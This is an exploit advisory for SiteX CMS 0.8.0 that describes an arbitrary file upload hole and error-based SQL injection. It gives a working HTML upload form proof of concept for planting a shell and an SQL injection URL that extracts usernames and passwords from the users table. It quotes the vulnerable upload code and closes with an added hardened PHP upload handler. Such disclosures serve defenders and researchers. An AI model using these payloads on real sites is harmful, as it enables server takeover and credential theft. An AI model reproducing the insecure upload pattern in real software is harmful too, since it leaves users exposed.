# Exploit Title: SiteX 0.8.0 <= Multiple vulnerabilities
# Date: 23/11/2012
# Exploit Author: Kallimero
# Vendor Homepage: http://www.sitexcms.org/
# Version: 0.8.0
# Tested on: Debian
Introduction
============
SiteX is a simple open source CMS for managing small websites.
The vulnz
========
1- ) Arbitrary File Upload
The uploadify.php page does not secure the upload: the target path is built from $_REQUEST['folder'] and the client-supplied file name.
---------------[includes/uploadify/uploadify.php]---------------
if (!empty($_FILES)) {
    $tempFile = $_FILES['Filedata']['tmp_name'];
    $targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
    $targetFile = str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];
    // (...)
    move_uploaded_file($tempFile,$targetFile);
    echo "1";
}
---------------[index.php]---------------
A simple upload...
Here is a PoC:
----------------------------------
<form method="post" action="http://[target]/includes/uploadify/uploadify.php?folder=/" enctype="multipart/form-data" >
<input type="file" name="Filedata">
<input type="submit" value="Shell it baby !">
</form>
----------------------------------
2- ) SQL injections
There are many SQL injections. I'll just paste an easy one here:
http://[site]/redirect.php?linkid=1'+and+(select+'the game'+from(select+count(*),concat((select+concat(username,0x3a,password,0x27)+from+SiteX_Users+limit+0,1),floor(Rand(0)*1337))+as+s+from+information_schema.tables+group+by+s)b)-- -
Error based.
3- ) Others
This CMS globalizes all user input, so there is a huge number of vulnerabilities.
I report just a tiny selection here.
How to Fix ?
============
I mailed the developers; no response.
Stop using it until they fix it.
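For sites that cannot drop the CMS immediately, here is a hardened form of the upload logic quoted in section 1. It is an added example, not code from the author or from the SiteX project. The session key `sitex_admin`, the directory `UPLOAD_DIR` and the allowed type list are assumptions chosen for illustration.

```php
<?php
// Added example: hardened replacement for the uploadify.php logic in section 1.
// Assumptions (not from SiteX): the session key 'sitex_admin', the storage
// directory UPLOAD_DIR and the ALLOWED type list are hypothetical.
declare(strict_types=1);

const UPLOAD_DIR = '/var/www/sitex-uploads';   // outside the document root
const ALLOWED = [                              // MIME type => stored extension
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];
const MAX_BYTES = 2 * 1024 * 1024;

function fail(int $code, string $msg): void {
    http_response_code($code);
    exit($msg);
}

session_start();
// 1. Only authenticated users may upload; the quoted snippet shows no such check.
if (empty($_SESSION['sitex_admin'])) {
    fail(403, 'forbidden');
}

$file = $_FILES['Filedata'] ?? null;
if (!is_array($file) || $file['error'] !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
    fail(400, 'upload failed');
}
if ($file['size'] > MAX_BYTES) {
    fail(413, 'file too large');
}

// 2. Decide the type from the content, never from the client-supplied name.
$mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
$ext = is_string($mime) ? (ALLOWED[$mime] ?? null) : null;
if ($ext === null) {
    fail(415, 'type not allowed');
}

// 3. Ignore $_REQUEST['folder'] and the original file name entirely: the
//    server picks both the directory and a random name with a safe extension.
$target = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
if (!move_uploaded_file($file['tmp_name'], $target)) {
    fail(500, 'could not store file');
}
chmod($target, 0640);
echo '1';
```

If uploads have to be served from under the document root, also disable script execution for that directory in the web server configuration.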
Thanks
=========
All hwc members : Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0, gr4ph0s.
Please visit : http://orgasm.re/
Groucho